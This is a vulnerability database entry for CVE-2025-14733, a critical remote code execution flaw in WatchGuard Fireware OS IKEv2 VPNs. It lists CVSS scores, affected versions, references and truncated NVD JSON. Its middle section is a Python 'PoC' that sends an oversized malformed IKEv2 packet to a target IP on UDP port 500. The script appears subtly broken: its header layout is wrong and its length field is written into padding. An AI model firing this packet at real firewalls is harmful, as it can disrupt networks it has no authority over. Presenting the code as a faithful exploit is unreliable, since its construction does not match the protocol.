CVE-2025-14733

Description

An Out-of-bounds Write vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to execute arbitrary code. This vulnerability affects both the Mobile User VPN with IKEv2 and the Branch Office VPN using IKEv2 when configured with a dynamic gateway peer.This vulnerability affects Fireware OS 11.10.2 up to and including 11.12.4_Update1, 12.0 up to and including 12.11.5 and 2025.1 up to and including 2025.1.3.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:watchguard:firebox_t15:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t35:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:watchguard:firebox_m270:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_m290:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_m370:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_m390:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_m440:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:watchguard:firebox_t115-w:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t125:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t125-w:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t145:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t145-w:*:*:*:*:*:*:*:* - NOT VULNERABLE

WatchGuard Fireware OS 11.10.2 - 11.12.4_Update1

WatchGuard Fireware OS 12.0 - 12.11.5

WatchGuard Fireware OS 2025.1 - 2025.1.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14733 WatchGuard Fireware OS IKEv2 Out-of-bounds Write PoC
# This PoC demonstrates sending a malformed IKEv2 packet to trigger the vulnerability
# Note: This is for educational and authorized testing purposes only

import socket
import struct
import os

def create_ikev2_payload():
    """Create a malformed IKEv2 packet to trigger out-of-bounds write"""
    # IKEv2 Header
    # SPI (8 bytes) + Next Payload (1 byte) + Major Version (4 bits) + Minor Version (4 bits) + Exchange Type (1 byte)
    # Flags (1 byte) + Message ID (2 bytes) + Length (4 bytes)
    
    ikev2_header = b'\x00' * 8  # Initiator SPI
    ikev2_header += b'\x21'      # Next Payload: Security Association
    ikev2_header += b'\x20'      # Version: IKEv2
    ikev2_header += b'\x02'      # Exchange Type: IKE_SA_INIT
    ikev2_header += b'\x08'      # Flags
    ikev2_header += b'\x00\x00' # Message ID
    
    # Malformed payload with oversized data to trigger OOB write
    malformed_data = b'\x00' * 1400  # Large payload to overflow buffer
    
    packet = ikev2_header + malformed_data
    
    # Update length field
    length = struct.pack('>I', len(packet))
    packet = packet[:28] + length + packet[32:]
    
    return packet

def send_exploit(target_ip, target_port=500):
    """Send the exploit packet to target WatchGuard device"""
    packet = create_ikev2_payload()
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)
    
    try:
        print(f"[*] Sending IKEv2 exploit packet to {target_ip}:{target_port}")
        sock.sendto(packet, (target_ip, target_port))
        print("[+] Packet sent successfully")
        
        # Try to receive response
        try:
            data, addr = sock.recvfrom(4096)
            print(f"[+] Received response from {addr}: {data.hex()}")
        except socket.timeout:
            print("[-] No response received (possible vulnerability trigger)")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14733-poc.py <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    send_exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14733
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14733
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14733/
[4] VulDB https://vuldb.com/cve/CVE-2025-14733
[5] https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00027
[6] https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-14733

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14733", "sourceIdentifier": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "published": "2025-12-19T01:16:05.530", "lastModified": "2025-12-23T11:34:46.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Out-of-bounds Write vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to execute arbitrary code. This vulnerability affects both the Mobile User VPN with IKEv2 and the Branch Office VPN using IKEv2 when configured with a dynamic gateway peer.This vulnerability affects Fireware OS 11.10.2 up to and including 11.12.4_Update1, 12.0 up to and including 12.11.5 and 2025.1 up to and including 2025.1.3."}], "metrics": {"cvssMetricV40": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Red", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-12-19", "cisaActionDue": "2025-12-26", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "WatchGuard Firebox Out of Bounds Write Vulnerability", "weaknesses": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.10.2", "versionEndExcluding": "12.5.15", "matchCriteriaId": "C506DA98-651D-4EA6-BEAE-4E5E69841E0F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t15:*:*:*:*:*:*:*:*", "matchCriteriaId": "CC78E84B-C17B-44C5-9427-5EF97B90A6EF"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t35:*:*:*:*:*:*:*:*", "matchCriteriaId": "12FED793-9DF3-46BB-AA64-3B1934123616"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.10.2", "versionEndExcluding": "12.11.6", "matchCriteriaId": "9C81D87D-AB69-48F3-B780-1DB762865AB5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m270:*:*:*:*:*:*:*:*", "matchCriteriaId": "DB00A42A-2065-4914-80CA-981E62DEC2CC"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m290:*:*:*:*:*:*:*:*", "matchCriteriaId": "5FC5E2C2-B0E3-4879-9B7C-E6E84A7BEC4E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m370:*:*:*:*:*:*:*:*", "matchCriteriaId": "22AC145E-2F33-4C0D-AA78-080CEA1980AB"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m390:*:*:*:*:*:*:*:*", "matchCriteriaId": "80F83640-57E7-4DF8-A201-E8D5722EF978"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m440:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F639188-7E3D-46B8-8443-5B1F32A3EC59"}, {"vulnerable": false, "criteria": "cpe: ... (truncated)